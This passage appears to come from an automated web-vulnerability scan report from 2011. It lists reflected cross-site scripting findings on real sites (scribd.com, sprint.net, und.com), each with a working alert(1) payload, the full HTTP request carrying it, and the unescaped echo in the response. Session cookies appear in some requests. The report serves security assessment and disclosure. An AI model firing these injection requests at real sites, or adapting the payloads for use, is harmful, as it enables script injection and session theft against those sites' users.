Cookie: RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; xa=xa%3Dn%3B; tns=dataSource=cookie; __qseg=Q_D|Q_T; adops_master_kvs=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115328770:ss=1315115075506; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097330.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; snas_noinfo=1; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.2.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; rsi_segs=I07714_10272|I07714_10273

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:47 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 4 Sep 2011 01:04:47 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 553

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF08 <![endif]-->
<!--[if !IE]> token: 4baec32d-d2a8-4ee9-bf4a-c3739e992737 <
...[SNIP]...
<div class="searchTerm">"ae54f<script>alert(1)</script>793ad682c63"</div>
...[SNIP]...

5.83. http://www.scribd.com/embeds/63688924/content [start_page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /embeds/63688924/content

Issue detail

The value of the start_page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bf51</script><script>alert(1)</script>3cb4a3abca9 was submitted in the start_page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embeds/63688924/content?start_page=14bf51</script><script>alert(1)</script>3cb4a3abca9&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:55:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 48ms
Status: 200 OK
X-Cache: MISS from squid03.local
Via: 1.1 squid03.local:3128 (squid/2.7.STABLE9)
Expires: Sun, 04 Sep 2011 00:55:57 GMT
Cache-Control: no-cache
X-Debug: Embed with squid
Content-Length: 9516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
<script type="text/javascript">window.manager = new Scribd.Embeds.Content({"branded_logo":null,"page_count":5,"start_page":"14bf51</script><script>alert(1)</script>3cb4a3abca9","view_mode":"scroll","from_jsapi":false,"document":{"num_pages":5,"title":"Summary of State Collective Bargaining Agreements ","id":63688924}});</script>
...[SNIP]...

5.84. https://www.sprint.net/min/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /min/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e50"><script>alert(1)</script>d3106908dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /min27e50"><script>alert(1)</script>d3106908dc/?f=css/global.css,compass_ui/css/smoothness/jquery-ui-1.8.2.custom.css HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:41 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/min27e50"><script>alert(1)</script>d3106908dc/" />
...[SNIP]...

5.85. https://www.sprint.net/performance [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7db"><script>alert(1)</script>ec756d68c15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance3d7db"><script>alert(1)</script>ec756d68c15 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:11 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance3d7db"><script>alert(1)</script>ec756d68c15" />
...[SNIP]...

5.86. https://www.sprint.net/performance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe549"><script>alert(1)</script>958e28ceb0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performancefe549"><script>alert(1)</script>958e28ceb0d/ HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1124; path=/
Date: Sun, 04 Sep 2011 00:48:12 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performancefe549"><script>alert(1)</script>958e28ceb0d/" />
...[SNIP]...

5.87. https://www.sprint.net/performance/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d08e2"><script>alert(1)</script>a80de0e0c3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/?d08e2"><script>alert(1)</script>a80de0e0c3d=1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:50 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/?d08e2"><script>alert(1)</script>a80de0e0c3d=1" />
...[SNIP]...

5.88. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_line_xml.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c9e"><script>alert(1)</script>ad88d874842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance33c9e"><script>alert(1)</script>ad88d874842/gen_line_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:12 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance33c9e"><script>alert(1)</script>ad88d874842/gen_line_xml.php" />
...[SNIP]...

5.89. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_line_xml.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8338f"><script>alert(1)</script>13d9de34be1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/gen_line_xml.php8338f"><script>alert(1)</script>13d9de34be1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:23 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/gen_line_xml.php8338f"><script>alert(1)</script>13d9de34be1" />
...[SNIP]...

5.90. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_pop_xml.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90061"><script>alert(1)</script>413bc0303e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance90061"><script>alert(1)</script>413bc0303e6/gen_pop_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:37 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance90061"><script>alert(1)</script>413bc0303e6/gen_pop_xml.php" />
...[SNIP]...

5.91. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_pop_xml.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c64e"><script>alert(1)</script>2f160f05d4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/gen_pop_xml.php7c64e"><script>alert(1)</script>2f160f05d4b HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:49 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/gen_pop_xml.php7c64e"><script>alert(1)</script>2f160f05d4b" />
...[SNIP]...

5.92. https://www.sprint.net/performance/performance.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/performance.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 380b8"><script>alert(1)</script>0c607eb5845 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance380b8"><script>alert(1)</script>0c607eb5845/performance.swf HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:31 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance380b8"><script>alert(1)</script>0c607eb5845/performance.swf" />
...[SNIP]...

5.93. https://www.sprint.net/performance/performance.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/performance.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7085b"><script>alert(1)</script>c5bd3f6a3e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/performance.swf7085b"><script>alert(1)</script>c5bd3f6a3e1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:43 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/performance.swf7085b"><script>alert(1)</script>c5bd3f6a3e1" />
...[SNIP]...

5.94. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f73"><script>alert(1)</script>312ccc6a7af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sportsb3f73"><script>alert(1)</script>312ccc6a7af/m-footbl/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:50 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sportsb3f73"><script>alert(1)</script>312ccc6a7af/m-footbl/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.95. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d066e"><script>alert(1)</script>1d9633a65ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbld066e"><script>alert(1)</script>1d9633a65ee/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:51 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbld066e"><script>alert(1)</script>1d9633a65ee/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.96. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c955e"><script>alert(1)</script>dfec6a8d34d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9873956c955e"><script>alert(1)</script>dfec6a8d34d HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:52 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9873956c955e"><script>alert(1)</script>dfec6a8d34d','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.97. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99ae9"><script>alert(1)</script>fcb6a136b80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9873956?99ae9"><script>alert(1)</script>fcb6a136b80=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:48 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9873956?99ae9"><script>alert(1)</script>fcb6a136b80=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.98. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

